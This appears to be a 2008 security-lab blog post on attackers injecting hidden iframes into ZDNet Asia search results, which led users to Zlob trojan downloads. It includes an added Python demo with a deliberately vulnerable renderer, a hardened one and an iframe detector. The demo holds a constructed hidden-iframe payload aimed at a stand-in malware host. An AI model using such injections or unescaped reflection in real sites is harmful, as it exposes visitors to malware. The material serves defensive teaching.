NEWS FROM THE LAB - Wednesday, March 5, 2008

ZDNet Asia Compromised? Posted by Fei @ 04:28 GMT

ZDNet Asia is one of my bookmarked online resources that I frequently visit. The site is NOT compromised per se; rather, its search engine was abused by an attacker who submitted queries for popular keywords with an iFRAME embedded in them. The search results page reflects the query back into its HTML, so every such search URL becomes a page on a legitimate, high-ranking domain that loads the attacker's iFRAME. The popular search engines then indexed those result pages and are returning some of these 'iFRAME'ed results in the first few pages of their own search results. And the objective? To get the unsuspecting user to click on the link.
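To make the mechanism concrete, here is an added example (not F-Secure's or ZDNet Asia's code, and not the actual payload from the incident) that shows the two halves of this abuse: a search results page that echoes the query unescaped, beside the same page with the query HTML-escaped, and a small detector that walks a page's iframes and flags any that point off-site or are sized or styled to be invisible. The hostnames, the ad banner path, the trusted-host list and the attacker query are all constructed for illustration.

```python
"""Reflected HTML injection in a search results page, plus a detector for
injected iframes.  Added example; the query, hostnames, banner path and
iframe payload are constructed and are not from the real incident.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately frames content from (assumption for the demo).
TRUSTED_HOSTS = {"www.zdnetasia.com", "zdnetasia.com"}

# Constructed attacker query: a popular keyword followed by a hidden 1x1 iframe.
# The real payload and redirect domain are not reproduced here.
ATTACKER_QUERY = (
    'britney spears <iframe src="http://malware.example.invalid/in.cgi?3" '
    'width=1 height=1 style="visibility:hidden"></iframe>'
)


def render_results_vulnerable(query: str) -> str:
    """Echo the query into the page verbatim: the pattern that turns a search
    URL into an attacker-controlled page that search engines will index."""
    return (
        "<html><body><h1>Search results for: " + query + "</h1>"
        '<iframe src="http://www.zdnetasia.com/ads/banner.html"></iframe>'
        "</body></html>"
    )


def render_results_hardened(query: str) -> str:
    """Same page, but the query is HTML-escaped before being reflected, so
    '<iframe ...>' arrives in the browser as text, not markup."""
    return (
        "<html><body><h1>Search results for: " + html.escape(query, quote=True) + "</h1>"
        '<iframe src="http://www.zdnetasia.com/ads/banner.html"></iframe>'
        "</body></html>"
    )


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _is_tiny_or_hidden(attrs: dict) -> bool:
    """True for 0/1-pixel frames or frames hidden via inline style."""
    def dim(name):
        raw = str(attrs.get(name) or "").strip().lower().rstrip("px")
        return int(raw) if raw.isdigit() else None

    width, height = dim("width"), dim("height")
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "visibility:hidden" in style or "display:none" in style


def find_injected_iframes(page: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    """Return the src of every iframe that points off-site or is hidden.

    A legitimate, visible iframe on a trusted host is not reported; an
    attacker's frame is reported if either heuristic fires."""
    parser = _IframeCollector()
    parser.feed(page)
    suspicious = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        if host not in trusted_hosts or _is_tiny_or_hidden(attrs):
            suspicious.append(src)
    return suspicious


if __name__ == "__main__":
    for name, render in (("vulnerable", render_results_vulnerable),
                         ("hardened", render_results_hardened)):
        print(name, "->", find_injected_iframes(render(ATTACKER_QUERY)))
```

The detector is deliberately simple: it is the kind of check one would run over search-engine cache copies or over one's own result pages to spot reflected frames, and it would miss an attacker who injects a visible, same-host-looking frame, which is why the real fix is the escaping in the hardened renderer rather than the detector.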

ZDNet Asia Search Results

The last time we checked, 20,600 cached pages loading the iFRAME were found. Upon clicking on the malicious link, you get redirected to some Russian Business Network (RBN) IPs, and RBN is notorious for hosting not only malware but also rogue antivirus and antispyware applications. At the end of the redirects, the unsuspecting user might end up a victim of a Zlob trojan.

We detect it as Trojan-Downloader:W32/Zlob.HOG.

Signing off,

Update: This information was first posted on Dancho's blog, and he obviously deserves credit. When we last checked on the situation this morning, it seems that we found 18,400 "new" cached pages appearing with the iFrame, which are now redirecting users to a different domain.

ZDNet Asia Search Results New